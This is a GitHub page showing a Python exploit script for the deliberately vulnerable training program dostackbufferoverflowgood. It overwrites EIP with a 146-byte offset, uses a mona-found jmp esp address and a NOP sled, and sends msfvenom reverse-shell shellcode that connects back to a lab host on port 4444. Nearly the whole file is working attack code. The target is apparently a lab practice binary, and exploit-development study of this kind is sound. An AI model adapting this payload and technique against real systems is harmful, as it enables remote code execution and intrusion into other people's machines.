-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathDoStackBufferOverflowGood-vanilla-EIP.py
More file actions
64 lines (54 loc) · 2.79 KB
/
DoStackBufferOverflowGood-vanilla-EIP.py
File metadata and controls
64 lines (54 loc) · 2.79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/python
# Author : Nu11pwn
# Host system : Ubuntu
# Victim System : Windows 7
# A simple vanilla EIP overwrite for the dostackbufferoverflowgood practice program
# Vulnerable software : https://github.com/justinsteven/dostackbufferoverflowgood
import socket
victim_host = "10.0.0.213"
victim_port = 31337
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.78 LPORT=4444 -f c -f python -v shellcode -b "\x00"
shellcode = ""
shellcode += "\xd9\xc6\xbf\x04\x94\x81\xaa\xd9\x74\x24\xf4\x5b"
shellcode += "\x2b\xc9\xb1\x52\x31\x7b\x17\x03\x7b\x17\x83\xc7"
shellcode += "\x90\x63\x5f\x3b\x70\xe1\xa0\xc3\x81\x86\x29\x26"
shellcode += "\xb0\x86\x4e\x23\xe3\x36\x04\x61\x08\xbc\x48\x91"
shellcode += "\x9b\xb0\x44\x96\x2c\x7e\xb3\x99\xad\xd3\x87\xb8"
shellcode += "\x2d\x2e\xd4\x1a\x0f\xe1\x29\x5b\x48\x1c\xc3\x09"
shellcode += "\x01\x6a\x76\xbd\x26\x26\x4b\x36\x74\xa6\xcb\xab"
shellcode += "\xcd\xc9\xfa\x7a\x45\x90\xdc\x7d\x8a\xa8\x54\x65"
shellcode += "\xcf\x95\x2f\x1e\x3b\x61\xae\xf6\x75\x8a\x1d\x37"
shellcode += "\xba\x79\x5f\x70\x7d\x62\x2a\x88\x7d\x1f\x2d\x4f"
shellcode += "\xff\xfb\xb8\x4b\xa7\x88\x1b\xb7\x59\x5c\xfd\x3c"
shellcode += "\x55\x29\x89\x1a\x7a\xac\x5e\x11\x86\x25\x61\xf5"
shellcode += "\x0e\x7d\x46\xd1\x4b\x25\xe7\x40\x36\x88\x18\x92"
shellcode += "\x99\x75\xbd\xd9\x34\x61\xcc\x80\x50\x46\xfd\x3a"
shellcode += "\xa1\xc0\x76\x49\x93\x4f\x2d\xc5\x9f\x18\xeb\x12"
shellcode += "\xdf\x32\x4b\x8c\x1e\xbd\xac\x85\xe4\xe9\xfc\xbd"
shellcode += "\xcd\x91\x96\x3d\xf1\x47\x38\x6d\x5d\x38\xf9\xdd"
shellcode += "\x1d\xe8\x91\x37\x92\xd7\x82\x38\x78\x70\x28\xc3"
shellcode += "\xeb\x75\xad\xcb\xa5\xe1\xaf\xcb\x28\xae\x26\x2d"
shellcode += "\x20\x5e\x6f\xe6\xdd\xc7\x2a\x7c\x7f\x07\xe1\xf9"
shellcode += "\xbf\x83\x06\xfe\x0e\x64\x62\xec\xe7\x84\x39\x4e"
shellcode += "\xa1\x9b\x97\xe6\x2d\x09\x7c\xf6\x38\x32\x2b\xa1"
shellcode += "\x6d\x84\x22\x27\x80\xbf\x9c\x55\x59\x59\xe6\xdd"
shellcode += "\x86\x9a\xe9\xdc\x4b\xa6\xcd\xce\x95\x27\x4a\xba"
shellcode += "\x49\x7e\x04\x14\x2c\x28\xe6\xce\xe6\x87\xa0\x86"
shellcode += "\x7f\xe4\x72\xd0\x7f\x21\x05\x3c\x31\x9c\x50\x43"
shellcode += "\xfe\x48\x55\x3c\xe2\xe8\x9a\x97\xa6\x19\xd1\xb5"
shellcode += "\x8f\xb1\xbc\x2c\x92\xdf\x3e\x9b\xd1\xd9\xbc\x29"
shellcode += "\xaa\x1d\xdc\x58\xaf\x5a\x5a\xb1\xdd\xf3\x0f\xb5"
shellcode += "\x72\xf3\x05"
exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect((victim_host, victim_port))
# Log data, item 4
# Address=080414C3
# Message= 0x080414c3 : jmp esp | {PAGE_EXECUTE_READ} [dostackbufferoverflowgood.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\john\Desktop\dostackbufferoverflowgood.exe)
jmpesp = "\xC3\x14\x04\x08" # !mona jmp -r esp
payload = ""
payload += "A" * 146
payload += jmpesp
payload += "\x90" * 16
payload += shellcode
payload += "\n"
exploit.send(payload)